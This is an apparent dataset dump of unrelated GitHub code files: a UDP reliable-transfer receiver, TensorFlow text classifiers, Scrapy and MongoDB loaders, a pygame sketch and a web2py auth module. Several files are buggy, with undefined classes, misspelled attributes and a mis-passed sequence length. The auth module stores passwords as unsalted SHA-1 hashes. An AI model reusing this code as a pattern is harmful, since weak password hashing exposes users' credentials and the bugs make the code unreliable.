STPPacker(sport, 0)\n self._logger = STPReceiverLogger()\n self._seq = 0\n self._ack = 0\n\n self._payload = None\n self._payload_isn = 0\n self._rcv_win = set()\n\n def receiving(self):\n '''\n receiving all the payloads and return as a whole bytearray\n '''\n packer = self._packer\n logger = self._logger\n with self._socket as sock:\n state = STP_STA['NOT_CONN']\n while True:\n recv, addr = sock.recvfrom(4096)\n try:\n seq, ack, opts, payload = packer.unpacking(recv)\n except ValueError as err:\n if err.args[0] == \"port check failed\" or err.args[0] == \"package corrupted\":\n logger.log(\"rcv/corr\", 0, 0, (0, 0, 0, 0), 0)\n continue\n p_len = len(payload)\n if seq <= self._ack or self.check_dup((seq, payload)):\n logger.log(\"rcv/dup\", seq, ack, opts, p_len)\n else:\n logger.log(\"rcv\", seq, ack, opts, p_len)\n if opts == (0, 0, 1, 0) and state == STP_STA['NOT_CONN']:\n self._ack = seq + p_len\n packet = packer.packing(self._seq, self._ack, (1, 0, 1, 0), ONE_BYTE)\n sock.sendto(packet, addr)\n logger.log(\"snd\", self._seq, self._ack, (1, 0, 1, 0), 1)\n state = STP_STA['SYN_SENT']\n elif opts == (1, 0, 0, 0) and state == STP_STA['SYN_SENT']:\n self._ack = seq + p_len\n state = STP_STA['CONN_EST']\n self.set_payload_isn(seq + p_len)\n elif opts == (0, 1, 0, 0) and state == STP_STA['CONN_EST']:\n event = self.update_receive_window(ack, (seq, payload))\n packet = packer.packing(self._seq, self._ack, (1, 0, 0, 0), ONE_BYTE)\n sock.sendto(packet, addr)\n logger.log(event, self._seq, self._ack, (1, 0, 0, 0), 1)\n elif opts == (0, 0, 0, 1) and state == STP_STA['CONN_EST']:\n if ack == self._seq + 1:\n self._seq += 1\n self._ack = seq + p_len\n logger.log(\"snd\", self._seq, self._ack, (1, 0, 0, 0), 1)\n packet = packer.packing(self._seq, self._ack, (1, 0, 0, 0), ONE_BYTE)\n sock.sendto(packet, addr)\n self._seq += 1\n logger.log(\"snd\", self._seq, self._ack, (0, 0, 0, 1), 1)\n packet = packer.packing(self._seq, self._ack, (0, 0, 0, 1), ONE_BYTE)\n sock.sendto(packet, addr)\n state = STP_STA['FIN_SENT']\n elif opts == (1, 0, 0, 0) and state == STP_STA['FIN_SENT']:\n if ack == self._seq + 1:\n state = STP_STA['FIN_RCVD']\n logger.summarize_hook(len(self._payload))\n return self._payload\n elif opts == (0, 0, 1, 0):\n print(\"Please restart receiver.\")\n sys.exit(1)\n else:\n pass\n # print(f\"unexpected {opts} with payload {payload}\")\n return b''\n\n def set_payload_isn(self, isn):\n ''' set isn for payload '''\n self._payload = b''\n self._payload_isn = isn\n\n def update_receive_window(self, ack, p_info):\n ''' use _ack as CACK pointer, _rcv_win as receive 
buffer '''\n self._rcv_win.add(p_info)\n rcv_win = sorted(self._rcv_win, key=lambda x: x[0])\n t_seq, t_load = rcv_win[0]\n if t_seq == self._ack:\n # received ack checked here\n while t_seq == self._ack and ack <= self._seq + 1:\n self._ack += len(t_load)\n self._payload += t_load\n rcv_win.pop(0)\n if not rcv_win:\n break\n t_seq, t_load = rcv_win[0]\n self._rcv_win = set(rcv_win)\n self._seq += 1\n return \"snd\"\n if t_seq < self._ack:\n self._rcv_win.remove(p_info)\n return \"snd/DA\"\n assert t_seq > self._ack\n return \"snd/DA\"\n\n def check_dup(self, p_info):\n ''' check whether same segment appears in _rcv_win '''\n return p_info in self._rcv_win\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print(f\"Usage: ./{__file__} receiver_port file_name\")\n sys.exit(1)\n S_PORT = int(sys.argv[1])\n F_NAME = str(sys.argv[2])\n RECEIVER = STPReceiver(S_PORT)\n F_BYTES = RECEIVER.receiving()\n with open(F_NAME, \"wb\") as open_pdf:\n open_pdf.write(F_BYTES)\n","repo_name":"zebraNeon/comp3331-mini-tcp-implementation","sub_path":"receiver.py","file_name":"receiver.py","file_ext":"py","file_size_in_byte":7110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30317567634","text":"# -*- coding: UTF-8 -*- \n'''\nCreated on Wed May 6 15:23:56 2020\n\n@author: Damon Li\n'''\n\nimport tensorflow as tf\nfrom text_cnn_module import TextCNN\nfrom utils import text_cls_data_loader\nimport jieba\nimport os\n\nclass text_classifier(object):\n\n def __init__(self, tf_session, setting):\n\n with tf_session.as_default():\n with tf_session.graph.as_default(): # 定义属于计算图graph的张量和操作\n latest_save_time = max([int(dir) for dir in os.listdir(setting.text_cnn_model_save_dir)])\n\n latest_checkpoint_dir = os.path.join(setting.text_cnn_model_save_dir, str(latest_save_time))\n\n self.text_cls_dropout_prob = setting.text_cls_dropout_prob #1.0\n\n self.text_cls_data_loader = text_cls_data_loader(setting)\n\n self.text_cls_data_loader.load_embedding()\n\n self.text_cnn = TextCNN(embedding_dir=setting.text_cls_embedding_dir,\n sequence_length=setting.text_cls_sentence_len, #20\n num_classes=setting.num_classes,#9\n filter_sizes=list(map(int, setting.filter_sizes.split(\" \"))),#[2,3,4]\n num_filters=setting.num_filters,#128\n vocab_processor_dir=os.path.join(latest_checkpoint_dir, 'vocab'),\n l2_reg_lambda=setting.l2_lambda,#0\n is_inference=True,\n device_id=setting.cpu_id)\n\n self.text_cnn.build_model()\n\n self.saver = tf.train.Saver(max_to_keep=setting.text_cls_num_checkpoints)\n ckpt = tf.train.get_checkpoint_state(os.path.join(latest_checkpoint_dir, 'checkpoints'))\n\n if ckpt and ckpt.model_checkpoint_path:\n self.saver.restore(tf_session, ckpt.model_checkpoint_path)\n print(\"[INFO] restored historical model successfully...\")\n else:\n print(\"[INFO] no any historical model to restore...\")\n\n def classifier(self, tf_session, text):\n\n with tf_session.as_default():\n with tf_session.graph.as_default(): # 定义属于计算图graph的张量和操作\n\n text = text.strip()\n seg_list = list(jieba.cut(text)) # : ['感冒', 'disease', '吃', '什么', '药']\n x_data = self.text_cls_data_loader.text_input_to_array(' '.join(seg_list)) # 找到分词在词典中对应的id,x_data=[[1270 4278 2465 4270 6940 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]]\n feed_dict = {self.text_cnn.input_x: x_data,\n self.text_cnn.dropout_keep_prob: self.text_cls_dropout_prob}\n predict = tf_session.run([self.text_cnn.predictions], feed_dict)\n\n return predict[0]\n\n\nif __name__ == '__main__':\n import settings\n setting = 
settings.setting()\n\n graph = tf.Graph()\n log_device_placement = True # 是否打印设备分配日志\n allow_soft_placement = True # 如果你指定的设备不存在,允许TF自动分配设备\n gpu_options = tf.compat.v1.GPUOptions(per_process_gpu_memory_fraction=0.3)\n session_conf = tf.compat.v1.ConfigProto(gpu_options=gpu_options,\n allow_soft_placement=allow_soft_placement,\n log_device_placement=log_device_placement)\n\n sess = tf.compat.v1.Session(graph=graph, config=session_conf)\n test_obj = text_classifier(sess, setting)\n while True:\n text = input(\"[INFO] Please input a chinese sentence below:\\n\")\n if text == 'exit' or text == 'quit':\n print('[INFO] Bye...')\n break\n predict = test_obj.classifier(sess, text)\n print(\"[RESULT] %s belongs to class %d ...\" % (text, predict))\n","repo_name":"DemonDamon/medichat","sub_path":"src/text_classification_module.py","file_name":"text_classification_module.py","file_ext":"py","file_size_in_byte":4079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17444717823","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nfrom sqlalchemy import create_engine, Table, Column, MetaData, Integer, Text, Float\nfrom scrapy.exceptions import DropItem\n\nclass CatePipeline(object):\n\n def __init__(self):\n _engine = create_engine(\"sqlite:///allitebooks.db\")\n _connection = _engine.connect()\n _metadata = MetaData()\n _stack_items = Table(\"allitebooks_category\", _metadata,\n Column(\"id\", Integer, primary_key=True),\n Column('cate_id', Integer, unique=True),\n Column('cate_link', Text),\n Column('cate_text', Text),\n Column('cate_father', Integer),\n Column('cate_level', Integer))\n _metadata.create_all(_engine)\n self.connection = _connection\n self.stack_items = _stack_items\n\n def process_item(self, item, spider):\n is_valid = True\n for data in item:\n if not data:\n is_valid = False\n raise DropItem(\"Missing %s!\" % data)\n if is_valid:\n ins_query = self.stack_items.insert().values(\n cate_id = item['cate_id'],\n\t\t\t\tcate_link = item['cate_link'],\n\t\t\t\tcate_text = item['cate_text'],\n\t\t\t\tcate_father = item['cate_father'],\n\t\t\t\tcate_level = item['cate_level'])\n self.connection.execute(ins_query)\n return item\n\nclass EbookPipeline(object):\n\n def __init__(self):\n _engine = create_engine(\"sqlite:///allitebooks.db\")\n _connection = _engine.connect()\n _metadata = MetaData()\n _stack_items = Table(\"allitebooks_ebookinfo\", _metadata,\n Column(\"id\", Integer, primary_key=True),\n Column('ebook_id', Integer, unique=True),\n Column('ebook_title', Text),\n Column('ebook_thumbnail', Text),\n Column('ebook_link', Text),\n Column('ebook_authors', Text))\n\n _metadata.create_all(_engine)\n self.connection = _connection\n self.stack_items = _stack_items\n\n def process_item(self, item, spider):\n is_valid = True\n for data in item:\n if not data:\n is_valid = False\n raise DropItem(\"Missing %s!\" % data)\n if is_valid:\n ins_query = self.stack_items.insert().values(\n ebook_id = item['ebook_id'],\n ebook_title = item['ebook_title'],\n ebook_thumbnail = item['ebook_thumbnail'],\n ebook_link = item['ebook_link'],\n ebook_authors = item['ebook_authors'])\n self.connection.execute(ins_query)\n return item\n\nclass EbookInfoPipeline(object):\n\n def __init__(self):\n _engine = create_engine(\"sqlite:///allitebooks.db\")\n _connection = _engine.connect()\n _metadata = 
MetaData()\n _stack_items = Table(\"allitebooks_ebookinfo\", _metadata,\n Column(\"id\", Integer, primary_key=True),\n Column('ebook_id', Integer, unique=True),\n Column('ebook_title', Text),\n Column('ebook_subtitle', Text),\n Column('ebook_thumbnail', Text),\n Column('ebook_link', Text),\n Column('ebook_authors', Text),\n \t\t\t\t\t Column('ebook_isbn', Text),\n \t\t\t\t\t Column('ebook_year', Integer),\n \t\t\t\t\t Column('ebook_pages', Integer),\n \t\t\t\t\t Column('ebook_language', Text),\n \t\t\t\t\t Column('ebook_filesize', Text),\n \t\t\t\t\t Column('ebook_fileformat', Text),\n \t\t\t\t\t Column('ebook_category', Text),\n \t\t\t\t\t Column('ebook_description', Text),\n \t\t\t\t\t Column('ebook_linkdownload', Text))\n\n _metadata.create_all(_engine)\n self.connection = _connection\n self.stack_items = _stack_items\n\n def process_item(self, item, spider):\n is_valid = True\n for data in item:\n if not data:\n is_valid = False\n raise DropItem(\"Missing %s!\" % data)\n if is_valid:\n ins_query = self.stack_items.insert().values(\n ebook_id = item['ebook_id'],\n ebook_title = item['ebook_title'],\n ebook_subtitle = item['ebook_subtitle'],\n\t\t\t\tebook_thumbnail = item['ebook_thumbnail'],\n\t\t\t\tebook_link = item['ebook_link'],\n\t\t\t\tebook_authors = item['ebook_authors'],\n\t\t\t\tebook_isbn = item['ebook_isbn'],\n\t\t\t\tebook_year = item['ebook_year'],\n\t\t\t\tebook_pages = item['ebook_pages'],\n\t\t\t\tebook_language = item['ebook_language'],\n\t\t\t\tebook_filesize = item['ebook_filesize'],\n\t\t\t\tebook_fileformat = item['ebook_fileformat'],\n\t\t\t\tebook_category = item['ebook_category'],\n\t\t\t\tebook_description = item['ebook_description'],\n\t\t\t\tebook_linkdownload = item['ebook_linkdownload'])\n self.connection.execute(ins_query)\n return item","repo_name":"thaolt007/allitebooks_crawler","sub_path":"allitebooks/allitebooks/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":5207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35665290253","text":"from pygame import *\r\n\r\nwindow = display.set_mode((700,500))\r\ndisplay.set_caption('ping-pong')\r\nback = (255,255,200)\r\nwindow.fill(back)\r\n\r\nclass GameSprite(sprite.Sprite):\r\n\r\n def __init__(self, player_image, player_x, player_y, size_x, size_y, player_speed):\r\n sprite.Sprite.__init__(self)\r\n\r\n self.image = transform.scale(image.load(player_image), (size_x, size_y))\r\n self.speed = player_speed\r\n \r\n self.rect = self.image.get_rect()\r\n self.rect.x = player_x\r\n self.rect.y = player_y\r\n\r\n def reset(self):\r\n window.blit(self.image, (self.rect.x, self.rect.y))\r\n\r\n\r\nracket1 = Player('racket.png', 30, 200, 4, 50, 150)\r\nracket2 = Player('racket.png', 520, 200, 4, 50, 150)\r\nball = GameSprite('tenis_ball.png', 200, 200, 4, 50, 50)\r\n\r\n\r\ngame = True\r\n\r\nwhile game:\r\n\r\n for e in event.get():\r\n if e.type == QUIT:\r\n run = False\r\n \r\n window.fill(back)\r\n racket1.update_l()\r\n racket2.update_r()\r\n\r\n racket1.reset()\r\n racket2.reset()\r\n ball.reset \r\n\r\n\r\n display.update()","repo_name":"tiretrak1/ping-pong","sub_path":"GameSprite.py","file_name":"GameSprite.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39988246750","text":"import pymongo\nimport datetime\nimport re\nimport csv\nimport pprint\n\nclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n\ndb = 
client[\"soen363\"]\n\ndef sanitizeRow(row):\n int_regex = \"^-?\\d+$\"\n float_regex = \"^\\d+(\\.\\d*)?$\"\n price_regex = \"^\\$\\d+(\\.\\d*)?$\"\n percent_regex = \"^\\d+\\%?$\"\n date_regex = \"^\\d{4}-\\d{2}-\\d{2}$\"\n for col in row:\n # Number\n if re.match(int_regex, row[col]) is not None:\n row[col] = int(row[col])\n continue\n\n if re.match(float_regex, row[col]) is not None:\n row[col] = float(row[col])\n continue\n\n # Prices\n if re.match(price_regex, row[col]) is not None:\n row[col] = float(row[col][1:])\n continue\n \n # Percent\n if re.match(percent_regex, row[col]) is not None:\n row[col] = float(row[col][0:len(row[col]) - 1])\n continue\n\n # Dates\n if re.match(date_regex, row[col]) is not None:\n row[col] = datetime.datetime.strptime(row[col], \"%Y-%m-%d\")\n\n # Booleans\n if (row[col] == \"t\"):\n row[col] = True\n continue\n if (row[col] == \"f\"):\n row[col] = False\n\n # Nulls\n if (row[col] == \"N/A\" or row[col] == \"\"):\n row[col] = None\n continue\n return row\n\ndef loadFile(name, filename):\n col = db[name]\n print(f'Loading {name}... This might take a while...')\n with open(filename, encoding=\"utf8\") as file:\n reader = csv.DictReader(file)\n for row in reader:\n row = sanitizeRow(row)\n col.insert_one(row)\n print(f'Loaded {name} successfully!')\n\na = datetime.datetime.now()\nloadFile('listings', '../extracted_mongo/listings-montreal.csv')\nloadFile('listings', '../extracted_mongo/listings-toronto.csv')\nloadFile('listings', '../extracted_mongo/listings-quebec.csv')\n\nloadFile('reviews', '../extracted_mongo/reviews-montreal.csv')\nloadFile('reviews', '../extracted_mongo/reviews-toronto.csv')\nloadFile('reviews', '../extracted_mongo/reviews-quebec.csv')\nb = datetime.datetime.now()\nc = b - a\npprint.pprint(str(c.microseconds * 0.001) + ' ms')\n\n#loadFile('reviews', '../extracted_mongo/reviews.csv')\n#loadFile('calendar', '../extracted_mongo/calendar.csv')","repo_name":"phong1233/soen363-project-phase2","sub_path":"mongo/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40281822516","text":"# Custom Authentication Class\n# Implementation similar to gluon.tools\n\nimport hashlib\n\n\nfrom gluon.html import URL\nfrom gluon.http import redirect\n\n# Authentication in pyForum will work in the following way:\n#\n# 3rd. Party Authentication Provider\n# ----------------------------------\n# This method will utilize a 3rd. party authenticator, upon successful\n# authentication, the system will do one of the following:\n# 1) If the user already exists, the system will log the user in, no\n# other update will be performed.\n# 2) If the user does not exist in the system, the system will create a brand\n# new user and profile for the user, the 'password' of this user's profile\n# will be set to a 'fake' or pseudo-random hash, since pyForum will never\n# collect sensitive information from its users (nor it can under this\n# scenario anyway).\n# Local User Account\n# ------------------\n# pyForum is capable of creating 'local' user accounts that do not depend on\n# any external sources (FaceBook, Google, etc), the account is protected with\n# a hash containing the user's username (not email), and the actual password\n#\n# What does all this mean? 
- it basically mean that you may sign up as a user\n# with your google account, and once logged in, go and change your password,\n# this will effectively make you a \"local\" account and you may 'skip' the\n# registration process, pretty slick huh?. It also has the side effect of\n# having an account that you can sign in with your pyForum-only password *or*\n# with your google account (without pyForum even knowing the google's pwd of\n# curse, man I'm _good_ :)\n\n\nclass CustomAuthentication(object):\n \"\"\" Role-Based authentication module \"\"\"\n\n def __init__(self, environment, db):\n self.request = environment['request']\n self.response = environment['response']\n self.session = environment['session']\n self.cache = environment['cache']\n self.T = environment['T']\n self.db = db\n self._anonymous_user = 'Anonymous User'\n self.environment = environment\n self.__user_id = None\n\n def __call__(self):\n \"\"\" Returns the username (email) \"\"\"\n return self.session.auth_email or self._anonymous_user\n\n def authenticate(self, auth_email, auth_passwd):\n \"\"\" sets authentication for the user \"\"\"\n self.logout() # Clear up previous session if any\n hash_pwd = hashlib.sha1('%s%s' % (auth_email, auth_passwd)).hexdigest()\n rows = self.db((self.db.auth_users.auth_email == auth_email) &\n (self.db.auth_users.auth_passwd == hash_pwd) &\n (self.db.auth_users.is_enabled == True)).select()\n if rows:\n self.__user_id = rows[0].id\n # These two next values go into our session\n self.session.auth_email = auth_email\n self.session.user_id = self.__user_id\n auth = True\n return self.session.user_id\n\n def authenticate_janrain(self, identifier, name, email, profile_pic_url):\n \"\"\" Authenticates against JANRAIN, formerly RPX, an authentication\n provider, see http://janrain.com/ for more information\n\n\n \"\"\"\n # Note: If this method is called, it means that the user\n # has been authenticated by the external source (janrain)\n # So all is left to be done is to add the user to our user DB\n # if he/she does not exist, and (*or*, if the user does indeed already\n # exist) update the user's metadata...\n # (name, email)\n # In addition, I am not (currently doing anything with profile_pic_url\n # or identifier but they might come in handy later.\n self.logout() # Clear up previous session if any\n user = self.db(\n (self.db.auth_users.auth_email == email) &\n (self.db.auth_users.is_enabled == True)).select().first()\n if user is None:\n # User does not exist, create it\n # This password is fake, not used for anything really...\n hash_passwd = hashlib.sha1('%s%s' % (name, identifier)).hexdigest()\n # New User - add it with the default role of Member\n # NOTE: THIS ROLE MUST EXIST\n auth_role_id = self.db(\n self.db.auth_roles.auth_role_name == 'zMember').select(\n self.db.auth_roles.id)[0].id\n auth_user_id = self.db.auth_users.insert(\n auth_email=email,\n auth_passwd=hash_passwd,\n auth_created_on=self.request.now,\n auth_modified_on=self.request.now,\n is_enabled=True)\n\n # Also, add this user's default role to the corresponding table.\n self.db.auth_user_role.insert(auth_user_id=auth_user_id,\n auth_role_id=auth_role_id)\n # Read the (new) user's back\n user = self.db(\n (self.db.auth_users.auth_email == email) &\n (self.db.auth_users.is_enabled == True)).select().first()\n user_id = user.id # Convenience\n self.__user_id = user_id\n self.session.auth_email = email\n self.session.user_id = user_id\n return user_id\n\n def logout(self):\n \"\"\" Clear the session \"\"\"\n 
self.session.auth_email = None\n self.session.user_id = None\n\n def has_role(self, roles):\n \"\"\" Receives a comma-separated string containing the roles to check\n and will return True if the user contains any of the passed roles\n\n \"\"\"\n hasrole = False\n roles_to_check = roles.split(',')\n roles_found = []\n if self.is_auth():\n auth_email = self.session.auth_email\n # select\n # ar.auth_role_name\n # from\n # auth_roles as ar,\n # auth_user_role as aur,\n # auth_users as au\n # where\n # au.auth_email = %(auth_email)s\n # and au.id = aur.auth_user_id\n # and aur.auth_role_id = ar.id\n user_roles = self.db(\n (self.db.auth_users.auth_email == auth_email) &\\\n (self.db.auth_users.id == \\\n self.db.auth_user_role.auth_user_id) &\\\n (self.db.auth_user_role.auth_role_id == \\\n self.db.auth_roles.id)).select(\n self.db.auth_roles.auth_role_name)\n if user_roles:\n roles_found = [each_role for each_role in user_roles\n if each_role.auth_role_name in roles_to_check]\n if roles_found:\n hasrole = True\n return hasrole\n\n def get_roles(self):\n \"\"\" Returns a list of roles the user belongs to \"\"\"\n roles = []\n if self.is_auth():\n auth_email = self.get_user_name()\n user_roles = self.db(\n (self.db.auth_users.auth_email == auth_email) &\\\n (self.db.auth_users.id == \\\n self.db.auth_user_role.auth_user_id) &\\\n (self.db.auth_user_role.auth_role_id == \\\n self.db.auth_roles.id)).select(\n self.db.auth_roles.auth_role_name)\n if user_roles:\n roles = [each_role.auth_role_name for each_role in user_roles]\n return roles\n\n def get_user_id(self):\n \"\"\" Returns the ID (Numeric) for the authentcated user, or None (NULL)\n if the user is not authenticated in the system\n\n \"\"\"\n return self.session.user_id\n\n def get_user_name(self):\n \"\"\" same as __call__ - returns the 'username' (email) \"\"\"\n return self.session.auth_email or self._anonymous_user\n\n def get_user_email(self):\n \"\"\" Deprecated - for compatibility only, use get_user_name()\n instead\n\n \"\"\"\n return self.get_user_name()\n\n def is_auth(self):\n \"\"\" True if the user has been authenticated in the system,\n false otherwise\n\n \"\"\"\n return True if self.session.user_id is not None else False\n\n def is_admin(self):\n \"\"\" This is a hack-y method (or shortcut) that can become useful in\n the future if the developer decides that \"zAdministrator\" should\n not be the only \"admin\" in the system\n\n \"\"\"\n return self.has_role('zAdministrator')\n\n def requires_login(self):\n \"\"\" Decorator Helper to aid in determine whether a controller needs\n specific access\n\n \"\"\"\n def wrapper(func):\n\n def f(*args, **kwargs):\n if not self.is_auth():\n return redirect(URL(r=self.request, c='default',\n f='login'))\n return func(*args, **kwargs)\n\n return f\n\n return wrapper\n\n def requires_role(self, roles):\n \"\"\" Decorator Helper to aid in determine whether a controller needs\n specific access\n\n \"\"\"\n def wrapper(func):\n\n def f(*args, **kwargs):\n if not self.has_role(roles):\n return redirect(URL(r=self.request, c='default',\n f='login'))\n return func(*args, **kwargs)\n\n return f\n\n return wrapper\n","repo_name":"mdipierro/web2py-appliances","sub_path":"PyForum2/modules/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":9249,"program_lang":"python","lang":"en","doc_type":"code","stars":208,"dataset":"github-code","pt":"3"} +{"seq_id":"21253617939","text":"import os,json\nfrom tkinter import filedialog\nimport tkinter as tkM\n\ndef ShowFileInEnding(path, 
end):\n\t\"\"\"\n\tInput: path: path to specific folder, end: end of wanter to be all file (example: end=\".jpg\" )\n\tProcessing: create a filder fild with all file in specific end, show it, and that revers it all back.\n\t\"\"\"\n\tif os.path.exists(path) and os.path.isdir(path):\n\t\tarr = os.listdir(path)\n\t\tdirectory = path + \"\\\\JJFolder\"\n\t\tos.makedirs(directory)\n\t\tfor i in range(0, len(arr), 1):\n\t\t\tos.rename(path + \"\\\\\" + arr[i], directory + \"\\\\\" + arr[i] + \"_\" + str(i) + end)\n\t\troot = tkM.Tk()\n\t\troot.filename = filedialog.askopenfilename(initialdir=directory, title=\"JJ-ShowFileInEnding\",\n\t\t\t\t\t\t\t\t\t\t\t\t filetypes=((\"all files\", \"*.*\"), (\"all files\", \"*.*\")))\n\t\tfor i in range(0, len(arr), 1):\n\t\t\tos.rename(directory + \"\\\\\" + arr[i] + \"_\" + str(i) + end, path + \"\\\\\" + arr[i])\n\t\tos.removedirs(directory)\n\t\troot.destroy()\n\telse:\n\t\tprint(\"path: %s\\nDose not exist or is not a valid folder name.\" % path)\n\ndef openAssets():\n\tdata_path = os.path.join(os.path.dirname(os.path.abspath( __file__ )),\"config.json\")\n\twith open(data_path) as f:\n\t\tdata = json.loads(f.read())\n\t\tf.close()\n\tAssets_path = data[\"Assets\"]\n\tThemes_path = data[\"Themes\"]\n\tos.startfile(Themes_path)\n\tShowFileInEnding(Assets_path, \".jpg\")\n\nif __name__ == '__main__':\n\topenAssets()\n","repo_name":"yehonathanJacob/yjacob","sub_path":"PythonLab/PersonalProjects/scripts/OpenAssets/open_assets.py","file_name":"open_assets.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"33133198702","text":"from PIL import Image\nfrom torchvision import transforms as tfs\nimport matplotlib.pyplot as plt\nimport numpy as np\nim = Image.open('./cat.png')\nprint('before scale, shape: {}'.format(im.size))\nnew_im = tfs.Resize((100, 200))(im)\nprint('after scale, shape: {}'.format(new_im.size))\nnew_im = np.array(new_im, dtype='float32') # 将其转换为一个矩阵\n# random_im2 = tfs.RandomCrop((150, 100))(im)\n# center_im = tfs.CenterCrop(100)(im)\n# h_filp = tfs.RandomHorizontalFlip()(im)\n# v_flip = tfs.RandomVerticalFlip()(im)\n# rot_im = tfs.RandomRotation(45)(im)\n# bright_im = tfs.ColorJitter(brightness=1)(im) # 0 - 2\n# bright_im = np.array(bright_im, dtype='float32') # 将其转换为一个矩阵\n# contrast_im = tfs.ColorJitter(contrast=1)(im) # 0-2\n# color_im = tfs.ColorJitter(hue=0.5)(im) # color -0.5 - 0.5\nim_aug = tfs.Compose([\n tfs.Resize(120),\n tfs.RandomHorizontalFlip(),\n tfs.RandomCrop(96),\n tfs.ColorJitter(brightness=0.5, contrast=0.5, hue=0.5)\n])\nnrows = 3\nncols = 3\nfigsize = (8, 8)\n_, figs = plt.subplots(nrows, ncols, figsize=figsize)\nfor i in range(nrows):\n for j in range(ncols):\n figs[i][j].imshow(im_aug(im))\n figs[i][j].axes.get_xaxis().set_visible(False)\n figs[i][j].axes.get_yaxis().set_visible(False)\nplt.show()\n# 数据增强提高了模型应对于更多的不同数据集的泛化能力\n\n# plt.imshow(bright_im.astype('uint8'))\n# plt.show()","repo_name":"KruskalLin/PytorchLearning","sub_path":"cnn/augumentation.py","file_name":"augumentation.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24360333988","text":"import tensorflow as tf\r\nimport numpy as np\r\nimport time\r\nimport os\r\nimport pickle\r\nfrom utils import prjPaths,get_logger\r\nfrom HAN_model_1 import HAN\r\nfrom dataProcessing import IMDB\r\n\r\nCONFIG = {\r\n 'dataset':'imdb',\r\n 'run_type':'train',\r\n 
'embedding_dim':300,\r\n 'batch_size':256,\r\n 'num_epochs':25,\r\n 'evaluate_every':100,\r\n 'log_summaries_every':30,\r\n 'checkpoint_every':100,\r\n 'num_checkpoint':5,\r\n 'max_grad_norm':5.,\r\n 'dropout_keep_proba':0.5,\r\n 'learning_rate':1e-3,\r\n 'per_process_gpu_memory_fraction':0.9\r\n}\r\n\r\ndef train():\r\n paths = prjPaths()\r\n\r\n with open(os.path.join(paths.LIB_DIR,CONFIG['dataset'],'persisted_vars.p'),'rb') as handle:\r\n persisted_vars = pickle.load(handle)\r\n\r\n persisted_vars['embedding_dim'] = CONFIG['embedding_dim']\r\n persisted_vars['max_grad_norm'] = CONFIG['max_grad_norm']\r\n persisted_vars['dropout_keep_proba'] = CONFIG['dropout_keep_proba']\r\n persisted_vars['learning_rate'] = CONFIG['learning_rate']\r\n pickle._dump(persisted_vars,open(os.path.join(paths.LIB_DIR,CONFIG['dataset'],'persisted_vars.p'),'wb'))\r\n\r\n with tf.Graph().as_default():\r\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=CONFIG['per_process_gpu_memory_fraction'])\r\n session_conf = tf.ConfigProto(allow_soft_placement=True,\r\n log_device_placement=False,\r\n gpu_options=gpu_options)\r\n\r\n session_conf.gpu_options.allocator = 'BFC'\r\n\r\n with tf.Session(config=session_conf) as sess:\r\n han = HAN(max_seq_len=persisted_vars['max_grad_norm'],\r\n max_sent_len=persisted_vars['max_sent_len'],\r\n num_classes=persisted_vars['num_classes'],\r\n vocab_size=persisted_vars['vocab_size'],\r\n embedding_size=persisted_vars['embedding_dim'],\r\n max_grad_norm=persisted_vars['max_grad_norm'],\r\n dropout_keep_proba=persisted_vars['dropout_keep_proba'],\r\n learning_rate=persisted_vars['learning_rate']\r\n )\r\n\r\n global_step = tf.Variable(0,name='global_step',trainable=False)\r\n\r\n # 梯度裁剪需要获取训练参数\r\n tvars = tf.trainable_variables()\r\n grads, global_norm = tf.clip_by_global_norm(tf.gradients(han.loss,tvars),\r\n han.max_grad_norm)\r\n\r\n optimizer = tf.train.AdamOptimizer(han.learning_rate) # todo 尝试其他参数\r\n\r\n train_op = optimizer.apply_gradients(zip(grads,tvars),\r\n name='train_op',\r\n global_step=global_step)\r\n\r\n merge_summary_op = tf.summary.merge_all()\r\n train_summary_writer = tf.summary.FileWriter(os.path.join(paths.SUMMARY_DIR,CONFIG['run_type']),sess.graph)\r\n\r\n # todo 这里的保存对象换成sess\r\n saver = tf.train.Saver(tf.global_variables(),max_to_keep=CONFIG['num_checkpoint'])\r\n\r\n sess.run(tf.global_variables_initializer())\r\n\r\n # _________train__________\r\n def train_step(epoch,x_batch,y_batch,docsize,sent_size,is_training):\r\n tic = time.time()\r\n\r\n feed_dict = {han.input_x:x_batch,\r\n han.input_y:y_batch,\r\n han.sentence_lengths:docsize,\r\n han.word_legths:sent_size,\r\n han.sis_training:is_training}\r\n _, step, loss, accuracy, summaries = sess.run([train_op,global_step,han.loss,han.accuracy,merge_summary_op],feed_dict=feed_dict)\r\n\r\n time_elapsed = time.time() - tic\r\n\r\n if is_training:\r\n print('Training||CurrentEpoch: {} || GlobalStep: {} || ({} sec/sep) || Loss {:g}) || Accuracy {:g}'.format(epoch + 1, step, time_elapsed, loss, accuracy))\r\n\r\n if step % CONFIG['log_summaries_every'] == 0:\r\n train_summary_writer.add_summary(summaries,step)\r\n print(f'Saved model summaries to {os.path.join(paths.SUMMARY_DIR,CONFIG[\"run_type\"])} \\n')\r\n\r\n if step % CONFIG['checkpoint_every'] == 0:\r\n chkpt_path = saver.save(sess,os.path.join(paths.CHECKPOINT_DIR,'han'),\r\n global_step=step)\r\n print('Saved model checkpoint to {} 